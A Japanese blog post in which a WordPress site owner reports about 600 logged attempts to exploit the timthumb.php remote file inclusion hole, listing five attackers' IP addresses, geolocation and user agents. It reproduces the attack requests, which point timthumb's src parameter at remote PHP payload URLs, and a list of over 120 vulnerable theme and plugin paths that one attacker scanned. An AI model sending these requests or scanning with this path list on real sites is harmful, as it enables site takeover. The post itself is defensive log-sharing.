timthumb.phpの貧弱製を用いてゾンビ状態に!

db_error.phpを作成してから色々とデータベース関連のエラーがメールで送られてくるようになりました。

通常このdb_error関連のエラーは通常のメールボックスに入っているのですが、今回はスパムとなぜか認定されており、原因をちょっと探ったところ、Wordpressでは有名なtimthumb.phpの脆弱性をつこうとしている関係であったと確認してしまいました。

攻撃者には残念ながらうちのWordPressのサイトではtimthumb等は使っておりませんので脆弱性をついた攻撃は失敗に終わっていますが以下にその攻撃者の関連情報を晒しておきます。


実は、ログを見たらこのtimthumb攻撃が大量に有りました。timthumbのやつだけ今年の始め頃からのだけを抽出した所実に600回超やられていたのが発覚!攻撃者のIPをとりあえずはじかなければなりませんね。

  1. 攻撃者その1:攻撃日時 2012/05/22 13:04:16 ~13:32:17 UTC の間に5回攻撃してきた。

    攻撃時に使用した方法

    /(当サイトの記事名)/wp-content/themes/wordprees/timthumb.php?src=http://picasa.com.ipsupply.com.au/wp-content/uploads/2012/03/load.php
    /wp-content/themes/wordprees/timthumb.php?src=http%3A%2F%2Fpicasa.com.ipsupply.com.au%2Fwp-content%2Fuploads%2F2012%2F03%2FIN.php
    //wp-content/themes/wordprees/timthumb.php?src=http://picasa.com.ipsupply.com.au/wp-content/uploads/2012/03/load.php
    /(当サイトの記事名)/wp-content/themes/wordprees/timthumb.php?src=http%3A%2F%2Fpicasa.com.ipsupply.com.au%2Fwp-content%2Fuploads%2F2012%2F03%2FIN.php


    攻撃者のIPアドレス:178.32.137.94

    IPアドレスから分かる一般的な情報

    IP: 178.32.137.94
    Decimal: 2988476766
    Hostname: 178-32-137-94.ovh.net
    ISP: Ovh Systems
    Organization: OVH Srl
    Services: None detected
    Type:
    Assignment: Static IP

    IPアドレスから分かるエリア情報(Geolocation)

    国: イタリア it Italia イタリア 国旗 flag
    緯度(Latitude): 42.8333
    経度(Longitude): 12.8333

    その他情報

    リモートホスト 178-32-137-94.ovh.net
    攻撃者のユーザーエージェント Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6

    ユーザーエージェントから分かる情報(以下はUser Agent Strong.comより)

    Firefox BrowserFirefox 3.6
    Mozilla MozillaProductSlice.Claims to be a Mozilla based user agent, which is only true for Gecko browsers like Firefox and Netscape. For all other user agents it means ‘Mozilla-compatible’. In modern browsers, this is only used for historical reasons. It has no real meaning anymore
    5.0 Mozilla version
    Windows Platform
    U Security values:

    • N for no security
    • U for strong security
    • I for weak security
    Windows NT 5.1 Operating System:
    Windows XP OSWindows XP
    en-US Language Tag, indicates the language for which the client had been localized (e.g. menus and buttons in the user interface)
    en-US = アメリカの国旗English – United States
    rv:1.9.2 CVS Branch Tag
    The version of Gecko being used in the browser
    Gecko Gecko engine inside
    20100115 Build Date:
    the date the browser was built
    Firefox Name :
    Firefox BrowserFirefox
    3.6 Firefox version
  2. 攻撃者その2:攻撃日時 2012/04/18 UTC の間に 120回の攻撃
    及び   2012/05/13 UTC の間に 121回の攻撃をしてきた。

    攻撃時に使用した方法(以下121項目)ダブリは除く

    /wp-content/themes/8q/scripts/timthumb.php/wp-content/themes/aerial/lib/timthumb.php/wp-content/themes/aesthete/timthumb.php/wp-content/themes/albizia/includes/timthumb.php/wp-content/themes/amphion-lite/script/timthumb.php/wp-content/themes/aqua-blue/includes/timthumb.php/wp-content/themes/aranovo/scripts/timthumb.php/wp-content/themes/arras/library/timthumb.php/wp-content/themes/arras-theme/library/timthumb.php/wp-content/themes/arthemix-bronze/scripts/timthumb.php/wp-content/themes/arthemix-green/scripts/timthumb.php/wp-content/themes/artisan/includes/timthumb.php/wp-content/themes/a-simple-business-theme/scripts/timthumb.php/wp-content/themes/a-supercms/timthumb.php/wp-content/themes/aureola/scripts/timthumb.php/wp-content/themes/aurorae/timthumb.php/wp-content/themes/automotive-blog-theme/Quick%20Cash%20Auto/timthumb.php/wp-content/themes/automotive-blog-theme/timthumb.php/wp-content/themes/black_eve/timthumb.php/wp-content/themes/blex/scripts/timthumb.php/wp-content/themes/bloggnorge-a1/scripts/timthumb.php/wp-content/themes/blogified/timthumb.php/wp-content/themes/blue-corporate-hyve-theme/timthumb.php/wp-content/themes/bluemag/library/timthumb.php/wp-content/themes/blue-news/scripts/timthumb.php/wp-content/themes/bombax/includes/timthumb.php/wp-content/themes/breakingnewz/timthumb.php/wp-content/themes/brightsky/scripts/timthumb.php/wp-content/themes/brochure-melbourne/includes/timthumb.php/wp-content/themes/business-turnkey/assets/js/timthumb.php/wp-content/themes/calotropis/includes/timthumb.php/wp-content/themes/comet/scripts/timthumb.php/wp-content/themes/conceditor-wp-strict/scripts/timthumb.php/wp-content/themes/constructor/libs/timthumb.php/wp-content/themes/constructor/timthumb.php/wp-content/themes/coverht-wp/scripts/timthumb.php/wp-content/themes/cover-wp/scripts/timthumb.php/wp-content/themes/dark-dream-media/timthumb.php/wp-content/themes/deep-blue/timthumb.php/wp-content/themes/dimenzion/timthumb.php/wp-content/themes/epione/script/timthumb.php/wp-content/themes/evr-green/scripts/timthumb.php/wp-content/themes/famous/timthumb.php/wp-content/themes/featuring/timthumb.php/wp-content/themes/fliphoto/timthumb.php/wp-content/themes/flix/timthumb.php/wp-content/themes/fresh-blu/scripts/timthumb.php/wp-content/themes/go-green/modules/timthumb.php/wp-content/themes/granite-lite/scripts/timthumb.php/wp-content/themes/greydove/timthumb.php/wp-content/themes/greyzed/functions/efrog/lib/timthumb.php/wp-content/themes/heli-1-wordpress-theme/images/timthumb.php/wp-content/themes/ideatheme/timthumb.php/wp-content/themes/impressio/timthumb/timthumb.php/wp-content/themes/iwana-v10/timthumb.php/wp-content/themes/likehacker/timthumb.php/wp-content/themes/litepress/scripts/timthumb.php/wp-content/themes/magup/timthumb.php/wp-content/themes/make-money-online-theme-1/scripts/timthumb.php/wp-content/themes/make-money-online-theme-2/scripts/timthumb.php/wp-content/themes/make-money-online-theme-3/scripts/timthumb.php/wp-content/themes/make-money-online-theme-4/scripts/timthumb.php/wp-content/themes/make-money-online-theme/scripts/timthumb.php/wp-content/themes/moi-magazine/timthumb.php/wp-content/themes/my-heli/images/timthumb.php/wp-content/themes/mymag/timthumb.php/wp-content/themes/mystique/extensions/auto-thumb/timthumb.php/wp-content/themes/nash/theme-assets/php/timthumb.php/wp-content/themes/neofresh/timthumb.php/wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php/wp-content/themes/pearlie/scripts/timthumb.php/wp-content/themes/pico/scripts/timthumb.php/wp-content/themes/postage-sydney/includes/timthumb.php/wp-content/themes/probluezine/timthumb.php/wp-content/themes/regal/timthumb.php/wp-content/themes/shaan/timthumb.php/wp-content/themes/shadow/timthumb.php/wp-content/themes/simple-but-great/timthumb.php/wp-content/themes/simplenews_premium/scripts/timthumb.php/wp-content/themes/simple-red-theme/timthumb.php/wp-content/themes/simplewhite/timthumb.php/wp-content/themes/slidette/timThumb/timthumb.php/wp-content/themes/spotlight/timthumb.php/wp-content/themes/squeezepage/timthumb.php/wp-content/themes/suffusion/timthumb.php/wp-content/themes/swift/includes/timthumb.php/wp-content/themes/swift/timthumb.php/wp-content/themes/the_dark_os/tools/timthumb.php/wp-content/themes/tm-theme/js/timthumb.php/wp-content/themes/totallyred/scripts/timthumb.php/wp-content/themes/travelogue-theme/scripts/timthumb.php/wp-content/themes/true-blue-theme/timthumb.php/wp-content/themes/ttnews-theme/timthumb.php/wp-content/themes/twittplus/scripts/timthumb.php/wp-content/themes/typographywp/timthumb.php/wp-content/themes/ugly/timthumb.php/wp-content/themes/unity/timthumb.php/wp-content/themes/versitility/timthumb.php/wp-content/themes/vibefolio-teaser-10/scripts/timthumb.php/wp-content/themes/wpbus-d4/includes/timthumb.php/wp-content/themes/wp-creativix/scripts/timthumb.php/wp-content/themes/wp-newsmagazine/scripts/timthumb.php/wp-content/themes/wp-perfect/js/timthumb.php/wp-content/themes/wp-premium-orange/timthumb.php/wp-content/themes/zcool-like/timthumb.php/wp-content/themes/lifestyle/timthumb.php/wp-content/themes/Karma/timthumb.php/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php/wp-content/plugins/wp-marketplace/libs/timthumb.php/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php/wp-content/plugins/vk-gallery/lib/timthumb.php/wp-content/plugins/cac-featured-content/timthumb.php/wp-content/plugins/rent-a-car/libs/timthumb.php/wp-content/plugins/lisl-last-image-slider/timthumb.php/wp-content/plugins/islidex/js/timthumb.php/wp-content/plugins/kino-gallery/timthumb.php/wp-content/plugins/cms-pack/timthumb.php/wp-content/plugins/a-gallery/timthumb.php/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php/wp-content/plugins/verve-meta-boxes/tools/timthumb.php/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php


    攻撃者のIPアドレス:91.201.64.85

    IPアドレスから分かる一般的な情報

    IP: 91.201.64.85
    Decimal: 1539915861
    Hostname: 91.201.64.85
    ISP: DonEkoService Ltd
    Organization: DonEkoService Ltd
    Services: None detected
    Type: Broadband
    Assignment: Static IP

    IPアドレスから分かるエリア情報(Geolocation)

    国: Russian Federation ロシアの国旗
    緯度(Latitude): 60
    経度(Longitude): 100

    その他情報

    リモートホスト 91.201.64.85
    攻撃者のユーザーエージェント Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

    ユーザーエージェントから分かる情報(以下はUser Agent Strong.comより)

    Internet Explorer BrowserInternet Explorer 6.0
    Mozila ???
    4.0 ???
    compatible Compatibility flag
    Indicates that this browser is compatible with a common set of features
    MSIE 6.0 Name :
    Internet Explorer BrowserInternet Explorer version 6.0
    Windows NT 5.1 Operating System:
    Windows XP OS Windows XP
  3. 攻撃者その3:攻撃日時 2012/01/16 08:48:30 ~08:58:46 UTC の間に3回攻撃してきた。

    攻撃時に使用した方法(重複は除く)

    /(当サイトの記事名)/wp-content/themes/Quadro/scripts/timthumb.php?src=http://blogger.com.v2training.com.au/rei/myid.php
    /wp-content/themes/Quadro/scripts/timthumb.php?src=http://blogger.com.v2training.com.au/rei/myid.php


    攻撃者のIPアドレス:176.9.44.3

    IPアドレスから分かる一般的な情報

    IP: 176.9.44.3
    Decimal: 2953391107
    Hostname: h124526.exima-online.net
    ISP: Hetzner Online AG
    Organization: Hetzner Online AG
    Services: None detected
    Type: Corporate
    Assignment: Static IP

    IPアドレスから分かるエリア情報(Geolocation)

    国: ドイツドイツの国旗
    緯度(Latitude): 51
    経度(Longitude): 9

    その他情報

    リモートホスト h124526.exima-online.net
    攻撃者のユーザーエージェント BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212

    ユーザーエージェントから分かる情報(以下はUser Agent Strong.comより)

    Blackberry OSBlackBerry
    BlackBerry8310 Name :
    Blackberry OSBlackBerry model 8310
    4.5.0.55 Operating System:
    BlackBerryOS
    OS Version 4.5.0
    Profile Profile, see next line
    MIDP-2.0 Mobile Information Device Profile, a specification published for the use of Java on embedded devices
    Version 2.0
    Configuration Configuration, see next line
    CLDC-1.1 Connected Limited Device Configuration, is a specification of a framework for Java ME applications
    Version 1.1
    VendorID Id of the vendor
    212 Vendor : Etisalat/Etisalat Nigeria/Etisalat Misr
    Description: Browser for the BlackBerry smartphone
  4. 攻撃者その4:攻撃日時 2012/02/16 4:51:34 ~4:51:41 UTC の間に3回攻撃してきた。

    攻撃時に使用した方法(重複は除く)

    /wp-content/themes/photo-workshop/includes/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php
    /(当サイトのカテゴリー名)/wp-content/themes/photo-workshop/includes/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php
    /(当サイトのカテゴリー名)/wp-content/themes/photo-workshop/includes/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php


    攻撃者のIPアドレス:178.255.45.99

    IPアドレスから分かる一般的な情報

    IP: 178.255.45.99
    Decimal: 3003067747
    Hostname: da01.gda.vipower.pl
    ISP: Artnet Spolka z ograniczona odpowiedzialnoscia
    Organization: Vibiznes
    Services: None detected
    Type:
    Assignment: Static IP

    IPアドレスから分かるエリア情報(Geolocation)

    国: ポーランドポーランドの国旗
    州/リージョン: Mazowieckie
    都市: Warsaw
    緯度(Latitude): 52.25
    経度(Longitude): 21

    その他情報

    リモートホスト da01.gda.vipower.pl
    攻撃者のユーザーエージェント Mozilla/3.0 (OS/2; U)

    ユーザーエージェントから分かる情報(以下はUser Agent Strong.comより)

    Netscape BrowserNetscape 3.0
    Mozilla MozillaProductSlice. Claims to be a Mozilla based user agent, which is only true for Gecko browsers like Firefox and Netscape. For all other user agents it means ‘Mozilla-compatible’. In modern browsers, this is only used for historical reasons. It has no real meaning anymore
    3.0 Browser version
    OS/2 Operating System:
    OS/2
    U Security values:

    • N for no security
    • U for strong security
    • I for weak security
  5. 攻撃者その5:攻撃日時 2012/05/22 16:56:39 ~16:56:43 UTC の間に2回攻撃してきた。

    攻撃時に使用した方法(重複は除く)

    /(当サイトの記事名)/wp-content/themes/Quadro/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php
    /wp-content/themes/Quadro/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php


    攻撃者のIPアドレス:184.107.145.18

    IPアドレスから分かる一般的な情報

    IP: 184.107.145.18
    Decimal: 3094057234
    Hostname: 184.107.145.18
    ISP: Iweb Technologies
    Organization: Gate
    Services: None detected
    Type: Broadband
    Assignment: Static IP

    IPアドレスから分かるエリア情報(Geolocation)

    Country: Canada カナダの国旗
    State/Region: Quebec
    City: Montreal
    Latitude: 45.5
    Longitude: -73.5833
    Postal Code: h3e1z6

    その他情報

    リモートホスト 184.107.145.18
    攻撃者のユーザーエージェント Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i

    ユーザーエージェントから分かる情報(以下はUser Agent Strong.comより)

    Safari BrowserSafari
    Mozilla MozillaProductSlice. Claims to be a Mozilla based user agent, which is only true for Gecko browsers like Firefox and Netscape. For all other user agents it means ‘Mozilla-compatible’. In modern browsers, this is only used for historical reasons. It has no real meaning anymore
    5.0 Mozilla version
    SymbianOS Operating System:
    Symbian OS SymbianOS
    9.1 SymbianOS version
    U Security values:

    • N for no security
    • U for strong security
    • I for weak security
    en-us Language Tag, indicates the language for which the client had been localized (e.g. menus and buttons in the user interface)
    en-us = アメリカの国旗English – United States
    AppleWebKit The Web Kit provides a set of core classes to display web content in windows
    413 Web Kit build
    KHTML Open Source HTML layout engine developed by the KDE project
    like Gecko like Gecko…
    Safari Name :
    Safari BrowserSafari
    413 Safari build number
    es61i ノキアの携帯モデル名
スポンサーリンク
スポンサーリンク

フォローする

あ、気づきましたか?記事が少しでも役に立ったと思ったらシェアでもコメントでもしてみてください^^;
このページの短いURL: https://thejuraku.com/pc/?p=1037
110 queries in 0.287 seconds.